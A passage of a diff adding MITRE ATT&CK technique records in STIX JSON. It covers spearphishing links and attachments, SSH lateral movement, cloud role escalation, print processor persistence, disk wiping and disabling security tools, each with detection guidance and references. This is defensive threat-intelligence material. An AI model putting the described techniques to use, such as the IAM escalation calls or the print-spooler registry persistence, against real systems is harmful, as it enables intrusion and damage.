"mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0801", + "external_id": "T0801" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T13:26:16.082Z", + "name": "Spearphishing Link", + "description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)\n\nAdversaries may also embed “tracking pixels”, \"web bugs\", or \"web beacons\" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) (Citation: Ryte Wiki) These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server. (Citation: Ryte Wiki)(Citation: IAPP)\n\nAdversaries may also be able to spoof a complete website using what is known as a \"browser-in-the-browser\" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)\n\nAdversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to perform adversary-in-the-middle phishing by proxying the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor)\n\nAdversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as “quishing”). These links may direct a victim to a credential phishing page.(Citation: QR-campaign-energy-firm) By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans.(Citation: qr-phish-agriculture) These QR codes may be scanned by or delivered directly to a user’s mobile device (i.e., [Phishing](https://attack.mitre.org/techniques/T1660)), which may be less secure in several relevant ways.(Citation: qr-phish-agriculture) For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile’s smaller form factor.\n\nFrom the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Philip Winther", + "Sebastian Salla, McAfee", + "Menachem Goldstein", + "Robert Simmons, @MalwareUtkonos", + "Elpidoforos Maragkos, @emaragkos", + "Joas Antonio dos Santos, @C0d3Cr4zy", + "Austin Herrin", + "Obsidian Security", + "Sam Seabrook, Duke Energy" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nMonitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230", + "created": "2020-10-02T17:09:50.723Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1598/003", + "external_id": "T1598.003" + }, + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + }, + { + "source_name": "TrendMictro Phishing", + "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.", + "url": "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html" + }, + { + "source_name": "IAPP", + "description": "IAPP. (n.d.). Retrieved March 5, 2024.", + "url": "https://iapp.org/resources/article/web-beacon/" + }, + { + "source_name": "QR-campaign-energy-firm", + "description": "Jonathan Greig. (2023, August 16). Phishing campaign used QR codes to target large energy company. Retrieved November 27, 2023.", + "url": "https://therecord.media/phishing-campaign-used-qr-codes-to-target-energy-firm" + }, + { + "source_name": "PCMag FakeLogin", + "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.", + "url": "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + }, + { + "source_name": "Mr. D0x BitB 2022", + "description": "mr.d0x. (2022, March 15). Browser In The Browser (BITB) Attack. Retrieved March 8, 2023.", + "url": "https://mrd0x.com/browser-in-the-browser-phishing-attack/" + }, + { + "source_name": "Mandiant URL Obfuscation 2023", + "description": "Nick Simonian. (2023, May 22). Don't @ Me: URL Obfuscation Through Schema Abuse. Retrieved August 4, 2023.", + "url": "https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse" + }, + { + "source_name": "NIST Web Bug", + "description": "NIST Information Technology Laboratory. (n.d.). web bug. Retrieved March 22, 2023.", + "url": "https://csrc.nist.gov/glossary/term/web_bug" + }, + { + "source_name": "Proofpoint Human Factor", + "description": "Proofpoint. (n.d.). The Human Factor 2023: Analyzing the cyber attack chain. Retrieved July 20, 2023.", + "url": "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-human-factor-report.pdf" + }, + { + "source_name": "Ryte Wiki", + "description": "Ryte Wiki. (n.d.). Retrieved March 5, 2024.", + "url": "https://en.ryte.com/wiki/Tracking_Pixel" + }, + { + "source_name": "qr-phish-agriculture", + "description": "Tim Bedard and Tyler Johnson. (2023, October 4). QR Code Scams & Phishing. Retrieved November 27, 2023.", + "url": "https://www.proofpoint.com/us/blog/email-and-cloud-threats/cybersecurity-stop-month-qr-code-phishing" + }, + { + "source_name": "ZScaler BitB 2020", + "description": "ZScaler. (2020, February 11). Fake Sites Stealing Steam Credentials. Retrieved March 8, 2023.", + "url": "https://www.zscaler.com/blogs/security-research/fake-sites-stealing-steam-credentials" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-11T20:24:03.069Z", + "name": "SSH", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nOn macOS systems log show --predicate 'process = \"sshd\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \"ssh\" or eventMessage contains \"ssh\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nOn Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "An SSH server is configured and running." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6", + "created": "2020-02-11T18:27:15.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/004", + "external_id": "T1021.004" + }, + { + "source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", + "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.", + "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-29T18:29:06.873Z", + "name": "Additional Cloud Roles", + "description": "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker)\n(Citation: Microsoft O365 Admin Roles) \n\nThis account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.\n\nFor example, in AWS environments, an adversary with appropriate permissions may be able to use the CreatePolicyVersion API to define a new version of an IAM policy or the AttachUserPolicy API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)\n\nIn some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Microsoft Threat Intelligence Center (MSTIC)", + "Alex Parsons, Crowdstrike", + "Chris Romano, Crowdstrike", + "Wojciech Lesicki", + "Pià Consigny, Tenable", + "Clément Notin, Tenable", + "Praetorian", + "Alex Soler, AttackIQ", + "Arad Inbar, Fidelis Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Collect activity logs from IAM services and cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Office 365", + "IaaS", + "SaaS", + "Google Workspace", + "Azure AD" + ], + "x_mitre_version": "2.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", + "created": "2020-01-19T16:59:45.362Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1098/003", + "external_id": "T1098.003" + }, + { + "source_name": "Expel AWS Attacker", + "description": " Brian Bahtiarian, David Blanton, Britton Manahan and Kyle Pellett. (2022, April 5). Incident report: From CLI to console, chasing an attacker in AWS. Retrieved April 7, 2022.", + "url": "https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/" + }, + { + "source_name": "Microsoft O365 Admin Roles", + "description": "Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. al.. (2019, October 8). About admin roles. Retrieved October 18, 2019.", + "url": "https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide" + }, + { + "source_name": "AWS IAM Policies and Permissions", + "description": "AWS. (n.d.). Policies and permissions in IAM. Retrieved April 1, 2022.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html" + }, + { + "source_name": "Google Cloud IAM Policies", + "description": "Google Cloud. (2022, March 31). Understanding policies. Retrieved April 1, 2022.", + "url": "https://cloud.google.com/iam/docs/policies" + }, + { + "source_name": "Invictus IR DangerDev 2024", + "description": "Invictus Incident Response. (2024, January 31). The curious case of DangerDev@protonmail.me. Retrieved March 19, 2024.", + "url": "https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me" + }, + { + "source_name": "Microsoft Support O365 Add Another Admin, October 2019", + "description": "Microsoft. (n.d.). Add Another Admin. Retrieved October 18, 2019.", + "url": "https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d" + }, + { + "source_name": "Rhino Security Labs AWS Privilege Escalation", + "description": "Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.", + "url": "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:02.398Z", + "name": "Scripting", + "description": "Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. \n\nIn addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Module: Module Load", + "Script: Script Execution" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0853", + "external_id": "T0853" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-04T14:16:17.655Z", + "name": "Print Processors", + "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)\n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL.\n\nFor the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)\n\nThe print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Mathieu Tartare, ESET", + "Tahseen Bin Taj" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\\\Driver or HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\Driver as they pertain to print processor installations.\n\nMonitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad", + "created": "2020-10-05T13:24:49.780Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/012", + "external_id": "T1547.012" + }, + { + "source_name": "Microsoft AddPrintProcessor May 2018", + "description": "Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved October 5, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/win32/printdocs/addprintprocessor" + }, + { + "source_name": "Microsoft Intro Print Processors", + "description": "Microsoft. (2023, June 26). Introduction to print processors. Retrieved September 27, 2023.", + "url": "https://learn.microsoft.com/windows-hardware/drivers/print/introduction-to-print-processors" + }, + { + "source_name": "ESET PipeMon May 2020", + "description": "Tartare, M. et al. (2020, May 21). No “Game over” for the Winnti Group. Retrieved August 24, 2020.", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Disabling Security Tools", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "File monitoring", + "Host intrusion prevention systems", + "Signature-based detection", + "Log analysis", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2e0dd10b-676d-4964-acd0-8a404c92b044", + "created": "2017-05-31T21:31:07.958Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1089", + "external_id": "T1089" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/578.html", + "external_id": "CAPEC-578" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Disk Structure Wipe", + "description": "Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for unusual kernel driver installation activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "x_mitre_permissions_required": [ + "Administrator", + "root", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2e114e45-2c50-404c-804a-3af9564d240e", + "created": "2019-03-19T19:38:27.097Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1487", + "external_id": "T1487" + }, + { + "source_name": "Symantec Shamoon 2012", + "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.", + "url": "https://www.symantec.com/connect/blogs/shamoon-attacks" + }, + { + "source_name": "FireEye Shamoon Nov 2016", + "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html" + }, + { + "source_name": "Palo Alto Shamoon Nov 2016", + "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" + }, + { + "source_name": "Kaspersky StoneDrill 2017", + "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf" + }, + { + "source_name": "Unit 42 Shamoon3 2018", + "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-31T14:09:27.066Z", + "name": "Spearphishing Attachment", + "description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Philip Winther" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nFiltering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.\n\nMonitor for suspicious descendant process spawning from Microsoft Office and other productivity software.(Citation: Elastic - Koadiac Detection with EQL)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS", + "Windows", + "Linux" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "created": "2020-03-02T19:05:18.137Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1566/001", + "external_id": "T1566.001" + }, + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": 